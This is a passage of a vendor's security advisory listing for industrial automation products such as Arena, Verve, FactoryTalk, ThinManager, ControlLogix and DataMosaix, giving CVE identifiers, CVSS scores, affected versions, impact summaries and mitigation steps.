CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395 Dependency on third-party Component

Known Exploited Vulnerability (KEV) database: No

CVE-2024-12175

Another “use after free” code execution security issue exists in the affected products. This could allow a threat actor to craft a DOE file and force the software to use a resource that was already used. A threat actor could leverage this to execute arbitrary code. A legitimate user must execute the malicious code crafted by the threat actor for this to be used.

CVSS 3.1 Base Score: 7.8

CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-416 Use After Free

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software should use the risk mitigations.

Do not load untrusted Arena® model files.
Hold the control key down when loading files to help prevent the VBA file stream from loading.

For information on how to mitigate Security Risks, use our suggested security best practices.

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories

Glossary

DOE file: store model data using a Microsoft Compound File format, which acts as a container for several data streams

Out of bounds read vulnerability: when a program reads data from a memory location outside the bounds of a array or buffer

Out of bounds write code vulnerability: a software vulnerability where a program writes beyond the bounds of an allowed area of memory

Third-party vulnerability: a weakness or flaw in an external vendor, supplier, or service provider’s system, process, or software that can be exploited to compromise the security of a connected organization.

Uninitialized variable vulnerability: occurs when a program accesses a variable before it has been initialized

Use-After-Free (UAF) vulnerability: a type of memory corruption vulnerability that occurs when a program continues to access memory locations that have already been freed.

High

SD1712 | Third Party Remote Code Execution Vulnerability in Verve Reporting

Published Date:

November 14, 2024

Last Updated:

November 14, 2024

CVE IDs:

CVE-2024-37287

CVSS Scores (v3.1):

7.2

CVSS Scores (v4.0):

8.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: 11/14/24

Last updated: 11/14/24

Revision Number: 1.0

CVSS Score: v3.1: 6.8/10, v4.0: 8.4/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Version(s)	Corrected in Software Revision
Verve Reporting	<v1.39	V1.39

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-37287 IMPACT

Verve Reporting utilizes Kibana which contains a remote code execution vulnerability that allows an attacker with access to ML and Alerting connecting features as well as write access to internal ML to trigger a prototype pollution vulnerability, which can ultimately lead to arbitrary code execution. The code execution is limited to the container.

CVSS Base Score v3.1: 7.2/10

CVSS Vector CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.6/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-1395: Dependency on Vulnerable Third-Party Component

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Restrict Access to Built-in Verve Account
- Access to the built-in "verve" account should be limited to only administrators who need to perform administrative functions and should only be used for administrative purposes. Separate accounts should be used for day-to-day functions.
- Change the password for the built-in "verve" account if it has been shared.
Restrict Privileges for Other Accounts
- Verve Reporting comes with built-in roles to simplify the delegation of user permissions. Assigning a user the following two roles will allow them access to most Verve Reporting features (excluding user administration), but will not give them permission to execute this vulnerability.
  - all-all
  - feature-all-all
Disable Machine Learning
- Machine learning can be disabled in the Elasticsearch configuration override. Contact Verve support for assistance if needed.
  1. Connect to the Reporting server via SSH or terminal.
  2. Copy the Elasticsearch configuration override to the working directory.
    1. docker exec $(docker ps --filter "name=Reporting_elasticsearch" --format "{{ .ID }}") cat /usr/share/elasticsearch/config-templates/elasticsearch.override.yml > elasticsearch.override.yml
  3. Add the following line and save.
    1. xpack.ml.enabled: false
  4. Disable Verve Reporting from the Verve Software Manager.
  5. Update the Elasticsearch configuration override.
    1. docker config rm elasticsearchymloverride
      docker config create elasticsearchymloverride ./elasticsearch.override.yml
  6. Enable Verve Reporting from the Verve Software Manager and confirm that the application starts and "Machine Learning" is no longer listed in the main navigation bar under Analytics.
  7. Delete the copy of the Elasticsearch configuration override.
    1. rm elasticsearch.override.yml

Security Best Practices

High

SD1711 | Input Validation Vulnerability exists in Arena® Input Analyzer

Published Date:

November 14, 2024

Last Updated:

November 13, 2024

CVE IDs:

CVE-2024-6068

Products:

Arena® Input Analyzer

CVSS Scores (v3.1):

7.3

CVSS Scores (v4.0):

7.0

Revision Number:

1.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 11/14/2024

Revision Number: 1.0

CVSS Score: 3.1: 7.3/10, 4.0: 7.0/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Version	Corrected in Software Version
Arena® Input Analyzer	16.20.03 and prior	16.20.04

VULNERABILITY DETAILS

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6068 IMPACT

A memory corruption vulnerability exists in the affected products when parsing DFT files. Local threat actors can exploit this issue to disclose information and to execute arbitrary code. To exploit this vulnerability a legitimate user must open a malicious DFT file.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE 1284 Improper Validation of Specified Quantity in Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1709 | FactoryTalk View ME Remote Code Execution Vulnerability via Project Save Path

Published Date:

November 12, 2024

Last Updated:

November 12, 2024

CVE IDs:

CVE-2024-37365

Products:

FactoryTalk View Machine Edition

CVSS Scores (v3.1):

7.3

CVSS Scores (v4.0):

7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: November 12^th, 2024

Last updated: November 12^th, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.3/10, v4.0: 7.0/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve our customer’s business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Revision	Corrected in Software Revision
FactoryTalk View ME	>= V14; when using default folders privileges	V15

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

· To enhance security and prevent unauthorized modifications to HMI project files, harden the Windows OS by removing the INTERACTIVE group from the folder’s security properties.

· Add specific users or user groups and assign their permissions to this folder using the least privileges principle. Users with read-only permission can still test run and run the FactoryTalk View ME Station.

· Guidance can be found in FactoryTalk View ME v14 Help topic: “HMI projects folder settings”. It can be opened through FactoryTalk View ME Studio menu “help\Contents\FactoryTalk View ME Help\Create a Machine Edition application->Open applications->HMI project folder settings”. Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-37365 IMPACT

A remote code execution vulnerability exists in the affected product. The vulnerability allows users to save projects within the public directory allowing anyone with local access to modify and/or delete files. Additionally, a malicious user could potentially leverage this vulnerability to escalate their privileges by changing the macro to execute arbitrary code.

CVSS 3.1 Base Score: 7.3/10

CVSS Vector: CVSS: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

Critical

SD1710 | FactoryTalk® Updater Multiple Vulnerabilities

Published Date:

November 12, 2024

Last Updated:

November 12, 2024

CVE IDs:

CVE-2024-10943, CVE-2024-10944, CVE-2024-10945

Products:

FactoryTalk Updater

CVSS Scores (v3.1):

9.1, 8.4, 7.3

CVSS Scores (v4.0):

9.1, 7.1, 7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: 11/12/2024
Last Updated: 11/12/2024
Revision Number: 1.0
CVSS Score: Multiple, see below

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
FactoryTalk® Updater – Web Client	CVE-2024-10943	v4.00.00	v4.20.00
FactoryTalk® Updater – Client	CVE-2024-10944	All version	V4.20.00
FactoryTalk® Updater – Agent	CVE-2024-10945	All version	V4.20.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-10943 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 9.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE: CWE-922: Insecure Storage of Sensitive Information
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10944 IMPACT

A Remote Code Execution vulnerability exists in the affected product. The vulnerability requires a high level of permissions and exists due to improper input validation resulting in the possibility of a malicious Updated Agent being deployed.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE: CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· Control access to the server where FactoryTalk® Updater is running.

· Click the ‘Scan’ button, which will update the database

CVE-2024-10945 IMPACT

A Local Privilege Escalation vulnerability exists in the affected product. The vulnerability requires a local, low privileged threat actor to replace certain files during update and exists due to a failure to perform proper security checks before installation.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-358: Improperly Implemented Security Check for Standard
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical

SD1708 | ThinManager® Multiple Vulnerabilities

Published Date:

October 25, 2024

Last Updated:

October 25, 2024

CVE IDs:

CVE-2024-10386, CVE-2024-10387

Products:

FactoryTalk ThinManager

CVSS Scores (v3.1):

9.8, 7.5

CVSS Scores (v4.0):

9.3, 8.7

Revision Number:

1

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

ThinManager® Multiple Vulnerabilities

Published Date: 10/25/2024
Last Updated: 10/25/2024
Revision Number: 1.0
CVSS Score: Multiple, see below

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Version(s)

Corrected Version(s)

ThinManager®

11.2.0-11.2.9

12.0.0-12.0.7

12.1.0-12.1.8

13.0.0-13.0.5

13.1.0-13.1.3

13.2.0-13.2.2

14.0.0

11.2.10

12.0.8

12.1.9

13.0.6

13.1.4

13.2.3

14.0.1

Available here: ThinManager Downloads | ThinManager ®

VULNERABILITY DETAILS

The security of our products is important to us as your chosen industrial automation supplier. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-10386 IMPACT

An authentication vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in database manipulation.

CVSS 3.1 Base Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10387 IMPACT

A Denial-of-Service vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in Denial-of-Service.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

If able, navigate to the ThinManager® download site and upgrade to a corrected version of ThinManager® .

Implement network hardening for ThinManager® Device(s) by limiting communications to TCP 2031 to only the devices that require connection to the ThinManager® .

For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High

SD1707 | ControlLogix Vulnerable to Denial of Service via CIP Messages

Published Date:

October 10, 2024

Last Updated:

October 10, 2024

CVE IDs:

CVE-2024-6207

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Revision Number:

1.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: October 10, 2024
Last updated: October 10, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5, v4.0: 8.7

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in firmware revision	Corrected in firmware revision
ControlLogix® 5580	V28.011	V33.017, V34.014, V35.013, V36.011 and later
ControlLogix® 5580 Process	V33.011	V33.017, V34.014, V35.013, V36.011 and later
GuardLogix 5580	V31.011	V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5380	V28.011	V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 2	V31.011	V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 3	V32.013	V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5480	V32.011	V33.017, V34.014, V35.013, V36.011 and later
FactoryTalk® Logix Echo	V33.011	V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerability was reported to Rockwell Automation by Trevor Flynn.

CVE-2024-6207 IMPACT

A denial-of-service vulnerability exists in the affected products that will cause the device to result in a major nonrecoverable fault (MNRF) when it receives an invalid CIP request. To exploit this vulnerability a malicious user must chain this exploits with CVE 2021-22681 and send a specially crafted CIP message to the device. If exploited, a threat actor could help prevent access to the legitimate user and end connections to connected devices including the workstation. To recover the controllers, a download is required which ends any process that the controller is running.

CVSS Base Score v3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score v4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software are also encouraged to apply security best practices to minimize the risk of vulnerability.

Security Best Practices

ADDITIONAL RESOURCES

JSON CVE-2024-6207

High

SD1705 | PowerFlex 6000T CIP Security denial-of-service Vulnerability

Published Date:

October 07, 2024

Last Updated:

October 07, 2024

CVE IDs:

CVE-2024-9124

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 10/8/2024

Last Updated: 10/8/2024

Revision Number: 1.0
CVSS Score: 8.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Software Version	Corrected in Software Version
Drives - PowerFlex 6000T	8.001, 8.002, 9.001	10.001

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9124 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 6000T. If the device is overloaded with requests, it will become unavailable. The device may require a power cycle to recover it if it does not re-establish a connection after it stops receiving requests.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Check for Unusual or Exceptional Conditions
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

Security Best Practices

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

CVE-2024-9124 JSON

High

SD1706 | Logix Controllers Vulnerable to Denial-of-Service Vulnerability

Published Date:

October 07, 2024

Last Updated:

October 10, 2024

CVE IDs:

CVE-2024-8626

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Revision Number:

2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Logix Controllers Vulnerable to Denial-of-Service Vulnerability

Published Date: October 8, 2024

Last updated: October 10, 2024

Revision Number: 2.0

CVSS Score: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Firmware Revision	Corrected in Firmware Revision
CompactLogix 5380 controllers	v33.011<	v33.015 and later for versions 33 v34.011 and later
Compact GuardLogix® 5380 controllers	v33.011<
CompactLogix 5480 controllers	v33.011<
ControlLogix 5580 controllers	v33.011<
GuardLogix 5580 controllers	v33.011<
1756-EN4TR	v3.002	4.001 and later

Mitigations and Workarounds

Customers using the affected versions are encouraged to upgrade to corrected firmware versions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Security Best Practices

VULNERABILITY DETAILS

CVE-2024-8626 IMPACT

Due to a memory leak, a denial-of-service vulnerability exists in the affected products. A malicious actor could exploit this vulnerability by performing multiple actions on certain web pages of the product causing the affected products to become fully unavailable and require a power cycle to recover.

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVSS Base Score: 7.5/10 (high)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score: 8.7/10 (high)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 400 – Uncontrolled Resource Consumption

ADDITIONAL RESOURCES

JSON CVE-2024-8626

Medium

SD1704 | Improper Authorization Vulnerability in Verve® Asset Manager

Published Date:

October 04, 2024

Last Updated:

October 04, 2024

CVE IDs:

CVE-2024-9412

CVSS Scores (v3.1):

6.8

CVSS Scores (v4.0):

8.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 10/8/24

Last updated: 10/8/24

Revision Number: 1.0

CVSS Score: v3.1: 6.8, v4.0: 8.4

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Versions

Corrected in software version

Verve® Asset Manager

All versions < 1.38

V1.38

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9412 IMPACT

An improper authorization vulnerability exists in the affected products that could allow an unauthorized user to sign in. While removal of all role mappings is unlikely, it could occur in the case of unexpected or accidental removal by the administrator. If exploited, an unauthorized user could access data they previously but should no longer have access to.

CVSS Base Score v3.1: 6.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS Base Score v4.0: 8.4/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-842: Placement of User into Incorrect Group

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

The presence of any mappings will help prevent this vulnerability from being exploited. If all mappings must be removed, manually removing previously mapped users is an effective workaround.

Security Best Practices

ADDITIONAL RESOURCES

· JSON CVE-2024-9412

Critical

SD1703 | DataMosaix™ Private Cloud third-party Vulnerabilities

Published Date:

October 04, 2024

Last Updated:

October 04, 2024

CVE IDs:

CVE-2019-14855, CVE-2019-17543, CVE-2019-18276, CVE-2019-19244, CVE-2019-989, CVE-2019-9923

CVSS Scores (v3.1):

7.5, 8.1, 7.8, 7.5, 9.8, 7.5

CVSS Scores (v4.0):

9.3, 8.7, 9.3, 8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 10/8/24

Revision Number: 1.0

CVSS Score: 3.1: 7.5, 8.1, 7.8, 9.8 4.0: 8.7, 9.3

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product Affected Product Affected Versions

DataEdgePlatform

DataMosaix™ Private Cloud <=7.07 v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2019-14855 IMPACT

The affected product utilizes GnuPG which contains a certificate signature vulnerability found in the SHA-1 algorithm. A threat actor could use this weakness to create forged certificate signatures. If exploited, a malicious user could view customer data.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-17543 IMPACT

The affected product utilizes LZ4 which contains a heap-based buffer overflow vulnerability in versions before 1.9.2 (related to LZ4_compress_destSize), that affects applications that call LZ4_compress_fast with a large input. This issue can also lead to data corruption. NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk." If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 8.1 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-18276 IMPACT

The affected product utilizes shell.c which contains a vulnerability in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. A threat actor with command execution in the shell can use "enable -f" for runtime loading to gain privileges. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 7.8 CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-19244 IMPACT

The affected product utilizes SQLite 3.30.1 which contains a vulnerability in sqlite3Select in select.c that allows a crash if a subselect uses both DISTINCT and window functions and has certain ORDER BY usage. If exploited, a malicious actor could perform a denial-of-service, which would require the use to restart the software to recover it.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-9893 IMPACT

The affected product utilizes libseccomp, which contains a vulnerability in versions 2.4.0 and earlier that does not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE). This vulnerability could lead to bypassing seccomp filters and potential privilege escalations. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 9.8 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-9923 IMPACT

The affected product utilizes GNU Tar, which contains a vulnerability in pax_decode_header in sparse.c in versions before 1.32. pax_decode_header has a NULL pointer dereference when parsing certain archives that have malformed extended headers. If exploited, a malicious actor could perform a denial-of-service, which would require the use to restart the software to recover it.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

High

SD1702 | Sensitive Data Exposure and Escalating Privileges Vulnerabilities in DataMosaix™ Private Cloud

Published Date:

October 04, 2024

Last Updated:

October 04, 2024

CVE IDs:

CVE-2024-7952, CVE-2024-7953, CVE-2024-7956

CVSS Scores (v3.1):

7.5, 8.8, 8.1

CVSS Scores (v4.0):

7.5, 8.7, 7.6

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: 10/8/24

Revision Number: 1.0
CVSS Score: v3.1: 7.5, 8.8 v4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product	Affected Versions	Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud	<=7.07	v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7952 IMPACT

A data exposure vulnerability exists in the affected product. There are hardcoded links in the source code that lead to JSON files that can be reached without authentication. If exploited, a threat actor could view customer data.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE: Exposure of Sensitive Information to an unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7953 IMPACT

A vulnerability exists in the affected products that allows a threat actor to create a project and become the administrator for it. If exploited, a threat actor could create, modify, and delete their own project.

CVSS 3.1 Base Score: 8.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Missing Authorization
